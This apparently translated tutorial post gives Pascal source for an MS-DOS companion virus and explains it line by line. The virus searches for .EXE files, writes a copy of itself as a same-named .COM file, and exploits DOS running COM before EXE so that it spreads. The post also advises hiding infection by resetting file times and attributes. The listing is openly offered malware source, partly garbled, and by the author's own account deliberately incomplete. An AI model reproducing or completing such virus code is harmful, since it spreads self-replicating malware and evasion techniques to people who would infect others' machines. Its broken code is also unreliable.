Write Virus In Pascal + Explain

1. Here is an example of a simple, non-destructive virus template, just installed for your reference:
2.  
3. {$A-,B-,D-,E-,F-,G-,I-,L- ,N-,O-,P-,Q-,R-,S-,T-,V-, X-,Y- }
4. {$M 8192.0,16384}
5. uses
6. Dos, Crt;
7. const
8. extend = '*.EXE';
9. var
10. SRec : SearchRec;
11. NameOfVector, NameOfVictim : String;
12. VECTOR, VICTIM : File;
13. LengthOfVector : LongInt;
14. Buffer : Pointer;
15. begin
16. first. {...}
17. 2. FindFirst (extend, AnyFile, SRec);
18. 3. while (DosError = 0) and (IOResult = 0) do
19. 4. begin
20. 5. with SRec do
21. 6. if not ((Name='.') or (Name='..')
22. 7. or (not (Attr and Directory and VolumeID<>0)))
23. 8. then
24. 9. begin
25. 10. NameOfVictim:=Name;
26. 11. Delete(NameOfVictim, Pos('EXE',NameOfVictim),3);
27. 12. NameOfVictim:=NameOfVictim+'COM' ;
28. 13. Assign (VICTIM, NameOfVictim);
29. 14. Reset (VICTIM,1);
30. 15.
31. 16. if IOResult <> 0 then
32. 17. begin
33. 18. {...}
34. 19. Assign(VECTOR, NameOfVector);
35. 20. Reset (VECTOR, 1);
36. 21. LengthOfVector := FileSize (VECTOR);
37. 22. GetMem(Buffer,LengthOfVector);
38. 23. BlockRead(VECTOR, Buffer^, LengthOfVector);
39. 24. ReWrite (VICTIM,1);
40. 25. BlockWrite (VICTIM , Buffer^, LengthOfVector);
41. 26. Close (VECTOR);
42. 27. Close (VICTIM);
43. 28. FreeMem(Buffer, LengthOfVector);
44. 29. end;
45. 30. end;
46. 31. FindNext (SRec);
47. 32. end;
48. 33. Delete(NameOfVector,Pos('.COM',NameOfVector),4);
49. 34. NameOfVector := '/C '+NameOfVector+'.EXE';
50. 35. {..}
51. 36. {..}
52. 37. {-Execute the original EXE file-}
53. 38. SwapVectors;
54. 39. Exec(GetEnv('COMSPEC'), NameOfVector);
55. 40. SwapVectors;
56. end.
57. Explain :
58.  
59. To infect the file without leaving a trace, you should refer to the GetFTime() function; GetFAttr(); and SetFTime(); SetFAttr(); included in the DOS unit;
60.  
61. Variable declaration:
62. Quote:
63. Code:
64.  
65. var
66. SRec : SearchRec;
67. NameOfVector, NameOfVictim : String;
68. VECTOR, VICTIM : File;
69. LengthOfVector : LongInt;
70. Buffer : Pointer;
71.  
72.  
73. -NameOfVector : the name of the infected file, specified by the user to execute (eg BOITOAN.EXE)
74. -NameOfVictim : the name of the .EXE file found, the object to be infected (eg PROGRAM.EXE)
75. -VECTOR, VICTIM: file variable used to manipulate the two files mentioned above
76. -LengthOfVector: Vector file size
77. -Buffer: provides the memory area that will be used to load the VECTOR file;
78.  
79. At this point, a question arises as to how to check if the file is infected or not and handle it. If infected, then what to do again, this involves creating a keygen to mark the file (which is a string of characters specific to each virus - AVs can rely on this to detect the virus code. ) which is not mentioned in this article.
80.  
81. First, the Program will find an .exe file in the current directory (Command 2) and return information to the SREC variable;
82. If there is no error (error is generated when there is no .exe file) then assign the found file name to the variable NameOfVictim (command 10) assuming we get NameOfVictim='BAITAP.EXE', then change it to 'BAITAP.COM' (command 11+12).
83. Open the file BAITAP.COM, if there is an error, the above file may not exist (then DosError<>0)
84. If BAITAP.COM does not exist, continue with command 16
85.  
86. -Open the master file, get the size (19 -> 21)
87. -Load the master file into the memory area (22 -> 23)
88. -Create a new file BAITAP.COM and then Write the content of the memory area to this file (24 -> 25)
89. -Close the file, burn it to the hard disk (27)
90. -Erase the contents of the device, in case of detection (28)
91.  
92. Thus, we have created a BAITAP.COM file with the same name as the BAITAP.EXE file that the program finds, but the content contained in this .COM file is the content of the Master file -> So the Master file ( is an infected file) has been cloned.
93. The remaining statements are to give execution permission to the original Master file at the request of the user.
94.  
95. The above code, if you test it, will not succeed because there are some lines that I have hidden because the article is only for learning a way of spreading the virus.
96.  
97. So, if you compile this file as VIRUS.EXE and run it, we will get:
98. -VIRUS looks for the .EXE file in the current directory, possibly itself.
99. Suppose you find the file PROGRAM.EXE
100. -Create a file PROGRAM.COM which is a copy of the virus
101.  
102. We repeat a bit, in DOS, the priority order of executable file types is as follows: COM > EXE > BAT > ...
103. So, later when the user types the following command:
104. C:\>PROGRAM
105. then the PROGRAM.COM file (generated by the virus) will be run, not the PROGRAM.EXE file
106. Thus VIRUS will have the opportunity to continue to take the spread.
107.  
108. Conclude
109. The above is the code of an F-Virus that runs on MS-DOS, but is easily detected on Windows.
110. Through the above article, we can understand how the infection simply takes advantage of the priority order of the .COM file compared to the .EXE file.